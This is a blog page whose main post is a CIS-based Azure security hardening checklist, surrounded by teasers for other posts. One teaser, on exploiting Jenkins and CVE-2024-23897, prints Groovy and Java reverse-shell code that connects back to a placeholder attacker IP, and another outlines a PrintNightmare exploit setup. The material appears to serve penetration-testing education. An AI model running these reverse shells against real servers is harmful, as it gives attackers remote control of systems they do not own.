Skip to main content

Exploiting Jenkins + CVE-2024-23897

Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()   For Windows,   String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea

Hardening your Azure cloud platform and best practices.

A quick reference on Azure Cloud platform security baseline based on CIS.
Baseline security checklist for commonly used Azure services. Please fast forward towards the end of this post, if you are looking for the CIS Microsoft Azure Foundations Security Benchmark
  • Turn on Azure Security Center - it's free - Upgrade your Azure subscription to Azure Security Center Standard. Security Center's Standard tier helps you find and fix security vulnerabilities, apply access and application controls to block malicious activity, detect threats using analytics and intelligence, and respond quickly when under attack.
  • Adopt CIS Benchmarks - Apply them to existing tenants.
  • Use CIS VMs for new workloads - from Azure Marketplace.
  • Store your keys and secrets in Azure Key Vault (and not in your source code) - Key Vault is designed to support any type of secret: passwords, database credentials, API keys and, certificates.
  • Install a web application firewall - Web application firewall (WAF) is a feature of Application Gateway that provides centralized protection of your web applications from common exploits and vulnerabilities.
  • Enforce multi-factor verification for users, especially your administrator accounts- Azure Multi-Factor Authentication (Azure MFA) helps administrators protect their organizations and users with additional authentication methods.
  • Encrypt your virtual hard disk files - This will help protect your boot volume and data volumes at rest in storage, along with your encryption keys and secrets.
  • Connect Azure virtual machines and appliances to other networked devices by placing them on Azure virtual networks - Virtual machines connected to an Azure virtual network can connect to devices on the same virtual network, different virtual networks, the Internet, or your own on-premises networks.
Operational Security best practices includes,
  • Manage your VM updates - Azure VMs, like all on-premises VMs, are meant to be user managed. Azure doesn't push Windows updates to them. Ensure you have solid processes in place for important operations such as patch management and backup.
  • Enable password management and use appropriate security policies to prevent abuse.
  • Review your Security Center dashboard regularly to get a central view of the security state of all of your Azure resources and take action on the recommendations.
A variety of security standards can help cloud service customers to achieve workload security when using cloud services. The following recommendations are based on CIS and should not be considered an exhaustive list of all possible security configurations and architectures but just as a starting point.
CIS has two implementation levels, and several categories of recommendations.
Level 1:
Recommended minimum security settings
These should be configured on all systems.
These should cause little or no interruption of services nor reduced functionality.
Level 2:
Recommendations for highly secure environments:
These might result in reduced functionality.
Categories of recommendations
1) Recommendations related to IAM policies
    -Restrict access to the Azure AD administration portal - Level 1
    -Enable Azure Multi-Factor Authentication (MFA) - Level 2
    -Block remembering MFA on trusted devices - Level 2
    -About guests - Level 1
        Ensure that no guest users exist, or alternatively if the business requires guest users, ensure to limit their permissions.
    -Password options
        -Notify users on password resets - Level 1
        -Notify all admins when other admins reset passwords - Level 2
        -Require two methods to reset passwords - Level 1
    -Establish an interval for reconfirming user authentication methods - Level 1
    -Members and guests can invite - Level 2
    -Users to create and manage security groups - Level 2
    -Self-service group management enabled - Level 2
    -Application options - Allow users to register apps - Level 2
2) Azure Security Center baseline
    Azure Security Center (ASC) provides unified security management and advanced threat protection for workloads running in Azure, on-premises, and in other clouds.
    -Enable the Standard pricing tier - Level 2
    -Enable the automatic provision of a monitoring agent - Level 1
        -When automatic provisioning is enabled, Security Center installs the Microsoft Monitoring Agent on all supported Azure VMs and any new ones that are created. Automatic provisioning is strongly recommended.
    -Enable System Updates - Level 1
    -Enable Security Configurations - Level 1
    -Enable Endpoint Protection (*) - Level 1
    -Enable Disk Encryption (*) - Level 1
    -Enable Network Security Groups (*) - Level 1
    -Enable Web Application Firewall (*) - Level 1
    -Enable Vulnerability Assessment (*) - Level 1
    -Enable Storage Encryption (*) - Level 1
    -Enable JIT Network Access (*) - Level 1
    -Enable Adaptive Application Controls (*) - Level 1
    -Enable SQL Auditing & Threat Detection (*) - Level 1
    -Enable SQL Encryption (*) - Level 1
    -Set Security Contact Email and Phone Number - Level 1
    -Enable Send me emails about alerts - Level 1
    -Enable Send email also to subscription owners - Level 1
3) Azure storage accounts baseline
    -Require security-enhanced transfers - Level 1
        Another step you should take to ensure the security of your Azure Storage data is to encrypt the data between the client and Azure Storage. The first recommendation is to always use the HTTPS protocol, which ensures secure communication over the public Internet. You can enforce the use of HTTPS when calling the REST APIs to access objects in storage accounts by enabling Secure transfer required for the storage account. Connections using HTTP will be refused once this is enabled.
    -Enable binary large object (blob) encryption - Level 1
    -Periodically regenerate access keys - Level 1
    -Require Shared Access Signature (SAS) tokens to expire within an hour - Level 1
    -Require SAS tokens to be shared only via HTTPS - Level 1
    -Enable Azure Files encryption - Level 1
    -Require only private access to blob containers - Level 1
        When you grant public access to a container, then anonymous users can read blobs within a publicly accessible container without authorizing the request.
4) Azure SQL Database baseline
    Azure SQL Server is a cloud-based relational database server that supports many of the same features as Microsoft SQL Server. It provides an easy transition from an on-premises database into a cloud-based one with built-in diagnostics, redundancy, security and scalability.
    -Enable auditing - Level 1
    -Enable all threat detection types - Level 1
    -Enable the option to send security alerts - Level 1
    -Enable the email service and co-administrators - Level 1
    -Configure audit retention for more than 90 days - Level 1
    -Configure threat detection retention for more than 90 days - Level 1
5) Logging and monitoring baseline
    Logging and monitoring are a critical requirement when trying to identify, detect, and mitigate security threats. Having a proper logging policy can ensure you can determine when a security violation has occurred, but also potentially identify the culprit responsible. Azure Activity logs provide data about both external access to a resources and diagnostic logs, which provide information about the operation of that specific resource.
    -Ensure that a log profile exists - Level 1
    -Ensure that activity log retention is set to 365 days or more - Level 1
    -Create an activity log alert for "Creating a policy assignment" - Level 1
    -Create an activity log alert for "Creating, updating, or deleting a Network Security Group" - Level 1
    -Create an activity log alerts for "Creating or updating an SQL Server firewall rule" - Level 1
6) Networking baseline
    Azure networking services maximize flexibility, availability, resiliency, security, and integrity by design. Network connectivity is possible between resources located in Azure, between on-premises and Azure-hosted resources, and to and from the Internet and Azure.
    -Restrict RDP and SSH access from the Internet - Level 1
        To enable access, use any of the following secure access offerings.
            -Point-to-site VPN
            -Site-to-site VPN
            -Azure ExpressRoute
            -Azure Bastion Host
    -Restrict SQL Server access from the Internet - Level 1
    -Configure the NSG flow log retention period for more than 90 days - Level 2
    -Enable Network Watcher - Level 1
7) Azure VM baseline
    Azure Policy is a service in Azure that you use to create, assign, and manage policies. These policies enforce different rules and effects over your resources, so those resources stay compliant with your corporate standards and service level agreements. Azure Policy meets this need by evaluating your resources for non-compliance with assigned policies.
    -A VM agent must be installed and enabled for data collection for Azure Security Center - Level 1
    -Ensure that OS disk are encrypted - Level 1
    -Ensure only approved extensions are installed - Level 1
    -Ensure that the OS patches for the VMs are applied - Level 1
    -Ensure that VMs have an installed and running endpoint protection solution - Level 1
8) Other baseline security considerations
    -Set an expiration date on all keys in Azure Key Vault - Level 1
    -Set an expiration date on all secrets in Azure Key Vault - Level 1
    -Set resource locks for mission-critical Azure resources - Level 2

Azure doesn't monitor security or respond to security incidents within the customer's area of responsibility. However, Azure does provide many tools (such as Azure Security Center, Azure Sentinel) that are used for this purpose.
 Link : CIS Microsoft Azure Foundations Security Benchmark.
 
 #Reference : docs.microsoft.com
Labels:

Popular posts from this blog

RUST error: linker `link.exe` not found

While compiling Rust program in a windows environment, you may encounter the error : linker `link.exe` not found. This is because of the absence of the C++ build tools in your machine. For compiling Rust programs successfully, one of the prerequisites is the installation of the Build Tools for Visual Studio 2019.   Download the Visual Studio 2019 Build tools from the Microsoft website. After the download, while installing the Build tools, make sure that you install the required components (highlighted in Yellow) This will download around 1.2GB of required files. Once everything is successfully installed, reboot and re-run your rust program and it will compile successfully.   Read More on RUST Hello World Rust Program : Code explained RUST Cargo Package Manager Explained Data Representation in Rust.
Read more

Download Microsoft Office 2019 offline installer.

When you do malware analysis of documents or office files, it is important to have Microsoft Office installed in your Lab machine. I am using flare VM and it doesn't comes with MS Office. Since Microsoft is promoting Microsoft 365 over the offline version, finding the offline installer is not that easy. Here is the list of genuine Microsoft links to download the office .img files.  Download Microsoft Office 2019 Professional Plus : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/ProPlus2019Retail.img Download Microsoft Office 2019 Professional : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/Professional2019Retail.img Download Microsoft Office 2019 Home and Business : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/HomeBusiness2019Retail.img Download Microsoft Office 2019 Home and Student : https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-U
Read more

Cisco ASA: Disable SSLv3 and configure TLSv1.2.

For configuring TLS v1.2, the ASA should run software version 9.3(2) or later. In earlier versions of ASA, TLS 1.2 is not supported.If you are running the old version, it's time to upgrade. But before that i will show you the config prior to the change. I am running ASA version 9.6.1 Now ,set the server-version to tlsv1.2, though ASA supports version tlsv1.1, its always better to configure the connection to more secure. Server here in the sense, the ASA will be act as the server and the client will connect to the ASA.     #ssl server-version tlsv1.2 set the client-version to tlsv1.2, if required.     #ssl client-version tlsv1.2 ssl cipher command in ASA offers 5 predefined security levels and an additional custom level.     #ssl cipher tlsv1.2 high we can see the setting of each cipher levels using #show ssl cipher command. Now set the DH group to 24, which is the strongest offered as of now in the ASA.     #ssl dh-group group24 An
Read more

How to Install Netmiko on Windows?

Netmiko, developed by kirk Byers is an open source python library  based on Paramiko which simplifies SSH management to network devices and is primarily used for network automation tasks. Installing Netmiko in linux is a matter o f one single command but if you need to use Netmiko in your Windows PC, follow this process. 1) Install the latest version of Python. 2) Install Anaconda, which is an opensource distribution platform that you can install in Windows and other OS's (https://www.anaconda.com/download/) 3) From the Anaconda Shell, run “ conda install paramiko ”. 4) From the Anaconda Shell, run “ pip install scp ”. 5) Now Install the Git for Windows. (https://www.git-scm.com/downloads) . Git is required for downloading and cloning all the Netmiko library files from Github. 6) From Git Bash window, Clone Netmiko using the following command git clone https://github.com/ktbyers/netmiko&#8221         7) Once the installation is completed, ch
Read more

PrintNightmare (CVE-2021-1675) PoC exploit Walkthrough

I am not an exploit developer but was interested to see how this vulnerability can be exploited. So i tried to replicate the infamous PrintNightmare vulnerability using the following PoCs ( https://github.com/cube0x0/CVE-2021-1675 ) and ( https://github.com/rapid7/metasploit-framework/pull/15385 ) However i had trouble with the new metasploit module (auxiliary/admin/dcerpc/cve_2021_1675_printnightmare) and i couldn't able to exploit the machine successfully. So i tried the second PoC from cube0x0. This one has done the magic. I just followed the guidelines with couple of tweaks. First of all, i installed the impacket (cube0x0 version) which will install the required modules and files. After that i set up a samba share with an anonymous login. This is required for hosting the dll file. I edited the smb.conf with the following settings. [global]     map to guest = Bad User     server role = standalone server     usershare allow guests = yes     idmap config * : backend = tdb     s
Read more

Unable to locate package linux-headers / E: Unable to locate package linux-headers-5.10.0-kali5-amd64

While compiling programs, you may encounter this particular error. E: Unable to locate package linux-headers-5.10.0-kali5-amd64 I encountered this while compiling a C code. To fix this, i first updated my Kali machine (v2020.2a).  sudo apt update -y && apt upgrade -y && apt dist-upgrade   Rebooted. Then installed the headers.   sudo apt install linux-headers-$(uname -r)  
Read more

Google Cloud : Basic Cloud Shell commands

Google Cloud resources can be managed in multiple ways. It can be done using Cloud Console, SDK or by using Cloud Shell. A few basic Google Cloud shell commands are listed below. 1)    List the active account name gcloud auth list 2)    List the project ID gcloud config list project 3)    Create a new instance using Gcloud shell gcloud compute instances create [INSTANCE_NAME] --machine-type n1-standard-2 --zone [ZONE_NAME] Use gcloud compute machine-types list to view a list of machine types available in particular zone. If the additional parameters, such as a zone is not specified, Google Cloud will use the information from your default project. To view the default project information, use gcloud compute project-info describe 4)    SSH in to the machine gcloud compute ssh [INSTANCE_NAME] --zone [YOUR_ZONE] 5)    RDP a windows server gcloud compute instances get-serial-port-output [INSTANCE_NAME] --zone [ZONE_NAME] 6)    Command to check whether the server is ready f
Read more

Difference between Azure management groups, Subscriptions and Resource groups

image courtesy : https://docs.microsoft.com Azure management groups help you manage your Azure subscriptions by grouping them together. If your organization has many subscriptions, you might need a way to efficiently manage access, policies, and compliance for those subscriptions. Azure management groups provide a level of scope above subscriptions. Azure subscriptions help you organize access to Azure resources and determine how resource usage is reported, billed, and paid for. Each subscription can have a different billing and payment setup, so you can have different subscriptions and plans by office, department, project, and so on. Resource groups are containers that hold related resources for an Azure solution. A resource group includes those resources that you want to manage as a group. You decide which resources belong in a resource group based on what makes the most sense for your organization. reference : https://docs.microsoft.com
Read more

Recovery Procedure: Alcatel-Lucent Omni-Switch not booting AOS: Going to Mini-boot prompt.

Problem: Switch not booting AOS; Going to Mini-boot prompt. Model: Alcatel-Lucent OS6850 [Note:The same procedure might be applicable for different models of Omni-Switches, However, for this illustration, i have used OS-6850 ] Reason: This problem may occurs due to corrupt AOS image files or misconfigured boot parameters. Hence switch cannot boot the images properly and will go to Mini-boot prompt.  Work Around: [Note: This zmodem procedure consumes a lot to time to finish the process.] 1.) Power off your OS6850 2.) When you switched it back on, stop it before the Miniboot (there is some counter counting down from 4). Press Enter to break. 3.) You will have the following prompt " => " 4.) Enter " setenv baudrate 115200 ”. Increasing baudrate helps to increase the data transfer speed using zmodem. 5.) Enter " saveenv " 6.) Enter " boot " 7.) The switch should run now in baud rate 115200 (so you have to change your clients ter
Read more

What is a Gratuitous ARP? How is it used in Network attacks?

Many of us encountered the word "Gratuitous" while exploring the network topic on ARP, The Address Resolution Protocol. Before explaining Gratuitous ARP, here is a quick review on how ARP works. ARP provides IP communication within a Layer 2 broadcast domain by mapping an IP address to a MAC address.For example, Host B wants to send information to Host A but does not have the MAC address of Host A in its ARP cache. Host B shoots a broadcast message for all hosts within the broadcast domain to obtain the MAC address associated with the IP address of Host A. All hosts within the same broadcast domain receive the ARP request, and Host A responds with its MAC address. We can see the ARP entries on our computers by entering the command arp -a . So, back to the topic on what is a Gratuitous reply, here is a better explanation. Gratuitous arp is when a device will send an ARP packet that is not a response to a request. Ideally a gratuitous ARP request is an ARP request packe
Read more